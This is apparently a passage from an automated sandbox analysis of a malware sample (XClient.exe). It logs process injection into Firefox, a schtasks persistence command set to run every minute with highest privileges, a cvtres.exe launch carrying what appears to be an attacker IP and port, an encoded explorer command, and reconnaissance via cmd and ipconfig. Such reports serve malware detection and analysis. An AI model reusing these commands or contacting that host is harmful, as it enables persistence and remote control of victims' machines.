PID 3728 wrote to memory of 1908 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3728 wrote to memory of 1908 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3728 wrote to memory of 1908 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 3728 wrote to memory of 1908 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1908 wrote to memory of 1724 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1908 wrote to memory of 1724 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1908 wrote to memory of 1724 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1908 wrote to memory of 1724 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1908 wrote to memory of 1724 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1908 wrote to memory of 1724 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1908 wrote to memory of 1724 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1908 wrote to memory of 1724 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1908 wrote to memory of 1724 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1908 wrote to memory of 1724 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1908 wrote to memory of 1724 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1908 wrote to memory of 1724 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1908 wrote to memory of 1724 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1908 wrote to memory of 1724 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1908 wrote to memory of 1724 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1908 wrote to memory of 1724 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1908 wrote to memory of 1724 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1908 wrote to memory of 1724 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1908 wrote to memory of 1724 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1908 wrote to memory of 1724 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1908 wrote to memory of 1724 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1908 wrote to memory of 1724 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1908 wrote to memory of 1724 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1908 wrote to memory of 1724 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1908 wrote to memory of 1724 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1908 wrote to memory of 1724 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1908 wrote to memory of 1724 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1908 wrote to memory of 1724 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1908 wrote to memory of 1724 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1908 wrote to memory of 1724 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1908 wrote to memory of 1724 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1908 wrote to memory of 1724 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1908 wrote to memory of 1724 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1908 wrote to memory of 1724 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1908 wrote to memory of 1724 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1908 wrote to memory of 1724 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1908 wrote to memory of 1724 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1908 wrote to memory of 1724 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1908 wrote to memory of 1724 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1908 wrote to memory of 1724 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1908 wrote to memory of 1724 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1908 wrote to memory of 1724 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1908 wrote to memory of 1724 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1908 wrote to memory of 3612 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1908 wrote to memory of 3612 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1908 wrote to memory of 3612 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1908 wrote to memory of 3612 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1908 wrote to memory of 3612 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1908 wrote to memory of 3612 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1908 wrote to memory of 3612 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1908 wrote to memory of 3612 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\XClient.exe

"C:\Users\Admin\AppData\Local\Temp\XClient.exe"

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "9" /tr "C:\Users\Admin\AppData\Roaming\9"

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1908.0.649411426\781794099" -parentBuildID 20230214051806 -prefsHandle 1796 -prefMapHandle 1788 -prefsLen 22074 -prefMapSize 235121 -appDir "C:\Program Files\Mozilla Firefox\browser" - {47bdefc3-9507-4622-9f62-7d1a3cb05db0} 1908 "\\.\pipe\gecko-crash-server-pipe.1908" 1876 1b40ab26b58 gpu

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1908.1.360179835\1938684313" -parentBuildID 20230214051806 -prefsHandle 2372 -prefMapHandle 2368 -prefsLen 22110 -prefMapSize 235121 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a2a911d8-856b-4916-a41e-8f7e5e28de86} 1908 "\\.\pipe\gecko-crash-server-pipe.1908" 2400 1b40b06a158 socket

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1908.2.474029681\1619232066" -childID 1 -isForBrowser -prefsHandle 2816 -prefMapHandle 2836 -prefsLen 22148 -prefMapSize 235121 -jsInitHandle 940 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {15a3f9a0-7af4-47a6-81e5-923e5d0cf735} 1908 "\\.\pipe\gecko-crash-server-pipe.1908" 2924 1b40cbdff58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1908.3.422207732\977801676" -childID 2 -isForBrowser -prefsHandle 3556 -prefMapHandle 3552 -prefsLen 27614 -prefMapSize 235121 -jsInitHandle 940 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4c9355d7-5722-4987-b8d4-d01d782481a7} 1908 "\\.\pipe\gecko-crash-server-pipe.1908" 3568 1b410281f58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1908.4.1099821736\1340688031" -childID 3 -isForBrowser -prefsHandle 5072 -prefMapHandle 5108 -prefsLen 27614 -prefMapSize 235121 -jsInitHandle 940 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8c07bb9f-88f6-4f15-a705-6f630b5e9191} 1908 "\\.\pipe\gecko-crash-server-pipe.1908" 5124 1b412793d58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1908.5.1979888236\584263989" -childID 4 -isForBrowser -prefsHandle 5276 -prefMapHandle 5280 -prefsLen 27614 -prefMapSize 235121 -jsInitHandle 940 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d20cb23f-1eb4-4db3-a17f-26c28cf21542} 1908 "\\.\pipe\gecko-crash-server-pipe.1908" 5264 1b412794358 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1908.6.351923267\453667161" -childID 5 -isForBrowser -prefsHandle 5468 -prefMapHandle 5472 -prefsLen 27614 -prefMapSize 235121 -jsInitHandle 940 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {98a4addf-5ece-4d56-b876-59c0023a9cdb} 1908 "\\.\pipe\gecko-crash-server-pipe.1908" 5456 1b412794f58 tab

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" 147.185.221.19 58023 <123456789> B9E013A2BA89BD4337BD

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -c explorer shell:::{3080F90E-D7AD-11D9-BD98-0000947B0257}

C:\Windows\SysWOW64\explorer.exe

"C:\Windows\system32\explorer.exe" shell::: -encodedCommand MwAwADgAMABGADkAMABFAC0ARAA3AEEARAAtADEAMQBEADkALQBCAEQAOQA4AC0AMAAwADAAMAA5ADQANwBCADAAMgA1ADcA -inputFormat xml -outputFormat text

C:\Windows\explorer.exe

C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {3eef301f-b596-4c0b-bd92-013beafce793} -Embedding

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe

C:\Windows\SysWOW64\ipconfig.exe

ipconfig

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --disable-3d-apis --disable-gpu --disable-d3d11 "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x108,0x10c,0x110,0xe4,0x114,0x7ffff7c73cb8,0x7ffff7c73cc8,0x7ffff7c73cd8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1932,8311589861548653093,9899105616192330390,131072 --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --mojo-platform-channel-handle=1948 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1932,8311589861548653093,9899105616192330390,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --mojo-platform-channel-handle=2128 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1932,8311589861548653093,9899105616192330390,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --mojo-platform-channel-handle=2644 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,8311589861548653093,9899105616192330390,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --disable-3d-apis --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3180 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,8311589861548653093,9899105616192330390,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --disable-3d-apis --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3212 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1932,8311589861548653093,9899105616192330390,131072 --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --mojo-platform-channel-handle=1828 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1932,8311589861548653093,9899105616192330390,131072 --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2328 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,8311589861548653093,9899105616192330390,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --disable-3d-apis --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4428 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,8311589861548653093,9899105616192330390,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --disable-3d-apis --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4572 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,8311589861548653093,9899105616192330390,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --disable-3d-apis --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3388 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,8311589861548653093,9899105616192330390,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --disable-3d-apis --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4412 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,8311589861548653093,9899105616192330390,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --disable-3d-apis --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3808 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1932,8311589861548653093,9899105616192330390,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --mojo-platform-channel-handle=3408 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1932,8311589861548653093,9899105616192330390,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --mojo-platform-channel-handle=4892 /prefetch:8

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Windows\SYSTEM32\CMD.EXE

"CMD.EXE"

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Local\Temp\ogamcm.exe

"C:\Users\Admin\AppData\Local\Temp\ogamcm.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1908.7.1454437334\1914846003" -childID 6 -isForBrowser -prefsHandle 3384 -prefMapHandle 3356 -prefsLen 31230 -prefMapSize 235121 -jsInitHandle 940 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {da23b8b2-8d07-465d-b02d-b28b5b78dab3} 1908 "\\.\pipe\gecko-crash-server-pipe.1908" 6020 1b415739658 tab

C:\Users\Admin\AppData\Roaming\9

C:\Users\Admin\AppData\Roaming\9

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1908.8.722784512\97774931" -childID 7 -isForBrowser -prefsHandle 6136 -prefMapHandle 4472 -prefsLen 31239 -prefMapSize 235121 -jsInitHandle 940 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a92f2113-cc57-4a74-a3b5-05c96a096757} 1908 "\\.\pipe\gecko-crash-server-pipe.1908" 4220 1b47dd7a558 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1908.9.1076339831\2087017650" -childID 8 -isForBrowser -prefsHandle 5392 -prefMapHandle 5408 -prefsLen 31239 -prefMapSize 235121 -jsInitHandle 940 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {58d2a243-ec86-495b-818c-3bbda2f60450} 1908 "\\.\pipe\gecko-crash-server-pipe.1908" 5380 1b47dd6f858 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1908.10.1893485382\1236217709" -childID 9 -isForBrowser -prefsHandle 6332 -prefMapHandle 6400 -prefsLen 31239 -prefMapSize 235121 -jsInitHandle 940 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a807f454-aa6a-42be-887a-126553a9a736} 1908 "\\.\pipe\gecko-crash-server-pipe.1908" 6412 1b4179ae258 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1908.11.1921925252\1980530805" -childID 10 -isForBrowser -prefsHandle 6400 -prefMapHandle 6412 -prefsLen 31239 -prefMapSize 235121 -jsInitHandle 940 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b4a0c16c-f939-4d70-8510-b4b1a4800d94} 1908 "\\.\pipe\gecko-crash-server-pipe.1908" 6524 1b4137e2858 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1908.12.1346984101\2124899432" -childID 11 -isForBrowser -prefsHandle 6256 -prefMapHandle 6252 -prefsLen 31239 -prefMapSize 235121 -jsInitHandle 940 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {43af9da8-3213-420e-a3ba-0c52571b8329} 1908 "\\.\pipe\gecko-crash-server-pipe.1908" 6248 1b4162d3d58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1908.13.705194091\580811465" -childID 12 -isForBrowser -prefsHandle 6204 -prefMapHandle 6220 -prefsLen 31239 -prefMapSize 235121 -jsInitHandle 940 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ff65f5b7-885d-4799-8d79-907337ba80c1} 1908 "\\.\pipe\gecko-crash-server-pipe.1908" 6192 1b4162d5b58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1908.14.1150801512\18048906" -childID 13 -isForBrowser -prefsHandle 6868 -prefMapHandle 6852 -prefsLen 31239 -prefMapSize 235121 -jsInitHandle 940 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {53ebcce0-b61a-465e-943f-b9052176a90a} 1908 "\\.\pipe\gecko-crash-server-pipe.1908" 6876 1b41a30fb58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1908.15.1483546069\582942221" -childID 14 -isForBrowser -prefsHandle 5696 -prefMapHandle 5512 -prefsLen 31239 -prefMapSize 235121 -jsInitHandle 940 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b98e502f-36d3-4795-a857-95ea487557ac} 1908 "\\.\pipe\gecko-crash-server-pipe.1908" 5460 1b419535358 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1908.16.194003883\307590932" -childID 15 -isForBrowser -prefsHandle 5628 -prefMapHandle 5552 -prefsLen 31239 -prefMapSize 235121 -jsInitHandle 940 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e933175d-b406-4bb5-862c-7af62cec5656} 1908 "\\.\pipe\gecko-crash-server-pipe.1908" 5676 1b419535c58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1908.17.1034720133\794915385" -childID 16 -isForBrowser -prefsHandle 6468 -prefMapHandle 6456 -prefsLen 31239 -prefMapSize 235121 -jsInitHandle 940 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1b66fb61-11a2-4b0c-a51b-29a22dfc6d8b} 1908 "\\.\pipe\gecko-crash-server-pipe.1908" 6852 1b419536558 tab

C:\Program Files\Mozilla Firefox\firefox.exe

